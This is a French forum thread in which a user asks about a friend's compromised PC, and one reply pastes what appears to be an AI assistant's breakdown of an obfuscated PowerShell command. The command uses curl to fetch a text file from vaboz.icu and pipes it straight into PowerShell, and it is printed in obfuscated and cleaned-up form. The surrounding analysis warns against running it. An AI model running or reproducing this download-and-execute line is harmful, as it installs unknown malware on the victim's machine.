Le 23 avril 2025 Ă 00:25:39 :
il a juste lancé un site internet de merde
C'est Ă dire ?
mérité le hackTu fais bien de demander **et de ne surtout pas exécuter** cette commande. Voici une analyse précise de ce qu'elle tente de faire :
---
```powershell
ÂČpoWErSHEll -W Mi"n"i"m"i"zed" cURL.eXE -k -L --"re"try 9"9"9 -"s"Sl -A "XIU" http"s://"v"a"boz.icu"/4e85bc"cbce0e"426f8937a"a309"7"855622".txt | pow"e"rs"h"el"l" -;
```
La commande est volontairement écrite de maniÚre bizarre (avec des guillemets insérés dans les mots comme `"p"o"w"e"r"s"h"e"l"l"`) pour **échapper aux filtres de sécurité** ou rendre la lecture humaine plus difficile.
```powershell
curl.exe -k -L --retry 999 -sSl -A "XIU" https://vaboz.icu/4e85bccbce0e426f8937aa3097855622.txt
```
- **`-k`** : ignore les erreurs SSL (certificats non valides).
- **`-L`** : suit les redirections.
- **`--retry 999`** : tente de réessayer indéfiniment (comportement abusif).
- **`-sSl`** : exécute en mode silencieux, mais affiche les erreurs importantes.
- **`-A "XIU"`** : change lâUser-Agent, souvent utilisĂ© pour contourner des blocages.
- Cela télécharge un **fichier texte potentiellement malveillant** depuis un **site suspect (vaboz.icu)**.
```powershell
| powershell -
```
Le `|` signifie : **le contenu du fichier tĂ©lĂ©chargĂ© est envoyĂ© directement Ă PowerShell**, donc **exĂ©cutĂ© immĂ©diatement** sans ĂȘtre enregistrĂ©.
---
- **Télécharge un script potentiellement malveillant depuis un domaine inconnu**.
- **Exécute ce script immédiatement** sans te montrer ce qu'il contient.
- Comme tout se passe en tĂąche de fond (minimized), tu **ne vois rien**.
---
Cette commande est :
- TrÚs probablement un **malware** (cheval de Troie, voleur de données, ransomware, etc.).
- Obfusquée pour **bypasser les antivirus et les yeux humains non avertis**.
- Issue dâun domaine qui nâest **clairement pas lĂ©gitime**.
Si tu lâas dĂ©jĂ exĂ©cutĂ©e : **dĂ©connecte le PC dâInternet et consulte un expert en sĂ©curitĂ© informatique immĂ©diatement.**
---
Tu veux que je tâaide Ă analyser le lien ou le fichier quâelle tĂ©lĂ©chargeait (sans lâexĂ©cuter) ?
Le 23 avril 2025 Ă 00:37:21 :
flemme d'aller sur mon mac pour voir le contenue du txt, si ton pote peut ouvrir le txt a la main et donner le contenu du script on pourra t'en dire un peu plus sur quel connerie il a choppé
Comment il peut trouver le txt ?
Afficher uniquement les messages de l'auteur du topic